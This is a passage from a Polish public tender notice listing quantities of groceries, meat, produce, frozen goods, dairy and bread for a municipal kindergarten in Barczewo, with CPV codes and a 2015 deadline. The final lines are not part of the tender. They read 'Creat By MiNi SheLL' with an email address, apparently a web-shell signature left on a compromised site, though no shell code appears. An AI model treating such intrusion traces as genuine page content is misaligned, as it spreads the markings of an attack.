70.	Tymianek suszony waga co najmniej10g	Szt	30
71.	Oregano suszone waga co najmniej 10g	Szt	30
72	Fasola czerwona w puszce waga co najmniej 400g	szt	100
73	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek,bazylia,pomidory)op.co najmniej0,25l	L	25
74	Galaretka owocowa w proszku op.co najmniej75g	szt	60
75	Pomidory w puszce( z otwieraczem) op.co najmniej 400g	szt	60
76	Kawa zbożowa sypana op.co najmniej 200g	szt	30
77	Wafelki różne smaki(kakaowe,śmietankowe)	kg	18
78	Drożdże świeże	kg	5
79	Płatki jaglane błyskawiczne op.250-500g	kg	15
80	Brzoskwinie w puszce	szt	20
81	Makaron łazanki op.400-500g	kg	30
82	Ryż brązowy op.400-1000g	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Karkówka surowa wieprzowa bez kości	Kg	340
2.	Łopatka wieprzowa surowa bez kości	Kg	1000
3.	Wołowina surowa ligawa	Kg	170
4.	Szynka wieprzowa surowa bez kości,bez skóry	Kg	150
5.	Filet z indyka surowy	Kg	150
6.	Filet z kurczaka surowy	Kg	350
7.	Schab bez kości surowy wieprzowy	Kg	110
8.	Udka bez grzbietu z kurczaka surowe	Kg	350
9.	Antrykot wołowy surowy	Kg	50
10.	Żebra wołowe surowe	Kg	50
11.	Porcje rosołowe z kurczaka	Kg	120
12.	Wątróbka drobiowa surowa	Kg	80
13.	Parówki wp. cienkie o zwartości co najmniej71% mięsa wp.	Kg	180
14.	Parówki drobiowe cienkie o zawartości mięsa co najmniej 60%	Kg	100
15.	Polędwica sopocka	kg	100
16.	Szynka wędzona parzona  mieso wp. 100%	kg	30
17.	Kiełbasa żywiecka sucha 	Kg	90
18.	Kiełbasa szynkowa drobiowa o zawartości mięsa co najmniej 60%baton	Kg	20
19.	Kiełbasa krakowska sucha	Kg	50
20.	Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.	kg	80
21.	Filet wędzony z indyka o zawartości mięsa co najmiej 90%	Kg	70
22.	Kiełbasa szynkowa wp. parzona	Kg	100
23.	Łopatka pieczona zawartość mięsa co najmniej 90%	kg	30
24.	Pasztet pieczony drobiowy zawierający co najmniej30% mięsa z kury	kg	40
25	Pasztet pieczony wp zawierający co najmniej 30% mięsa wp.	kg	30
26	Szynka wp.gotowana  o zawartości mięsa co najmniej 80%	kg	120
27	Szynka wiejska	kg	80
28	Smalec wp. kostka 200-250g	Kg	30
29	Boczek wędzony parzony	Kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ziemniaki 	kg	9000
2.	Marchew świeża korzeń	kg	1200
3.	Pietruszka świeża korzeń	kg	320
4.	Cebula biała	kg	180
5.	Cebula czerwona	kg	40
6.	Seler świeży korzeń	kg	280
7.	Por świeży	kg	220
8.	Kapusta czerwona świeża	kg	180
9.	Pieczarki świeże 	kg	100
10.	Czosnek kraj pochodzenie polska głowka 	szt	100
11.	Szczypior świeży pęczek	szt	850
12.	Rzodkiewka pęczek	szt	750
13.	Rzodkiew biała świeża	Kg	60
14	Sałata lodowa ,pakowana główka	szt	240
15	Sałata  zielona świeża główka	Szt	600
16	Pomidory czerwone, świeże	kg	500
17	Ogórek św.szklarniowy	kg	350
18	Ogórek swieży,zielony gruntowy	kg	100
19	Ogórek kwaszony	Kg	80
20	Kapusta kwaszona biała	kg	250
21	Kapusta pekinska 	kg	100
22	Kapusta biała słodka  główka	kg	300
23	Papryka czerwona ,żółta,zielona	kg	100
24	Cytryna świeża	Kg	100
25	Jabłka świeże	kg	3200
26	Banany świeże	kg	1000
27	Gruszki świeże	kg	500
28	kiwi	Kg	60
29	Mandarynki  świeże	kg	540
30	Winogrona zielone bezpestkowe	kg	180
31	Śliwka fioletowa duża	kg	100
32	Brzoskwinie	kg	120
33	Winogrona granatowe	kg	40
34	Koper zielony,świeży pęczek 100g	Szt	800
35	Natka pietruszki świeza pęczek  100g	szt	800
36	Burak czerwony świeży	Kg	600
37	Rodzynki op.co najmniej 100g-150g	kg	5
38	Orzechy włoskie łuskane op.co najmniej100g	kg	5
39	Fasola sucha średnia  op.400-1000g	Kg	30
40	Groch połówki op. 400-1000g	kg	30
41	Pietruszka suszona natka op.50-100g	kg	4
42	Włoszczyzna suszona op.100-200g	kg	4
43	Koper zielony suszony op 50-100g	kg	3
44	Pestki słonecznika op.50-150g	kg	8
45	Żurawina suszona op.250-500g	kg	8
46	Kalafior świeży w sezonie	szt	60
47	Brokuły świeze (w sezonie)	szt	60
48	Kapusta młoda( w sezonie)	kg	40
49	Młode ziemniaki(w sezonie)	kg	300
50	Botwinka (w sezonie)	pęcz	80
51	Cebulka suszona op.50-100g	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)	kg	2000
2.	Mieszanka 7-składnikowa z kapusta 2000-2500g	kg	160
3.	Brokuły mrożone 450g-2500g	kg	400
4.	Kalafior mrożony op.450-2500g	kg	400
5	Fasolka szparagowa żółta cięta op.450-2500g	kg	200
6	Fasolka szparagowa zielona cieta op.450-2500g	kg	200
7	Szpinak mrożony mielony.op.450-2500g	Kg	100
8 	Groszek zielony mrożony op.450-2500g	kg	60
9	Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g	kg	60
10	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 	Kg	500
11	Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna	kg	500
12	Truskawka mrożona op.450-2500g	Kg	250
13	Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g	Kg	230
14	Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g	kg	150
15	Marchew kostka op.450-2500g	kg	340
16	Marchew z groszkiem op.450-2500g	Kg	250
17	Wiśnia b)p op.450-2500g	Kg	100
18	Porzeczka czarna mrożona op.450-2500g	kg	80
19	Dorsz filet SHP	kg	250
20	Miruna filet SHP	kg	180
21	Morszczuk filet SHP	kg	80
22	Panga filet	kg	30
23	Makrela wędzona	Kg	55
24	Włoszczyzna 3-składnikowa paski op.450-2500g	Kg	130
25	Pyzy z mięsem op.500-1000g mrożone	kg	50
26	Pierogi z truskawkami op.500-1000g mrożone	kg	50
27 	Ryba sola filet mrożona	kg	30
28	Pierogi z jagodami mrożone op500-1000g	kg	50
29	Mieszanka kompotowa z owoców leśnych op2000-2500g	kg	500
30	Dorada filet	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko folia 2%op.1000ml	L	12500
2.	Serek topiony o smaku śmietankowym kostka 100g	szt	600
3.	Mleko UHT op.1000ml 2%	L	200
4.	Mleko UHT op.1000ml 3,2%	L	200
5.	Masło ekstra zawierajace co najmniej 82% tłuszczu	kg	530
6.	Jogurt wielosmakowy,waga op.co najmniej150g	szt	3800
7.	Serek homogenizowany wanilia op.co najmniej 135g	szt	1275
8.	 Deser waniliowy pakowany op. co najmniej120g	szt	250
9.	Jogurt z kawałkami owoców,waga op.co najmnie150g	szt	800
10.	Jogurt owocowy  do picia   op.co najmniej   125 ml	L	156
11	Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)	kg	75
12	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	80
13	Śmietana 12% op.200-400g	L	450
14	Śmietana 18% op.200-400g	L	260
15	Twaróg krajanka półtłusty	kg	900
16	Jogurt naturalny op. co najmniej 400ml	L	300
17	Serek topiony kostka 100g z szynką	Szt 	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb pszenno-żytni krojony foliowany waga co najmniej500g	Szt.	2450
2	Chleb razowy krojony foliowany waga co najmniej  400g	szt	2350
3	Bułki kajzerki waga co najmniej 50g	szt	3500
4	Bułka grahamka waga co najmniej 50-90g	szt	2000
5	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g	szt	550
6	Ciasto drożdżowe	kg	220
7	Chałka zdobna co najmniej 300g	szt	580
8	Babka piaskowa	Kg	140
9	Rogaliki krucho -drożdżowe nadziewane	kg	250
10	Bułki  maślane waga co najmniej 50g	szt	1000
11	Bułki czerstwe  waga co najmniej waga 50g	szt	1000
12	Bułka tarta	kg	120
13	Chleb wiejski krojony	szt	200
14	Piernik przekładany	Kg	56
15	Chleb żytni krojony	szt	250
16	Paszteciki z kapustą i grzybami	szt	500
17	Rolada biszkoptowa z galaretka	kg	230
18	Pączki z marmoladą	szt	250
19	Rogale z makiem waga co najmniej 50g	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com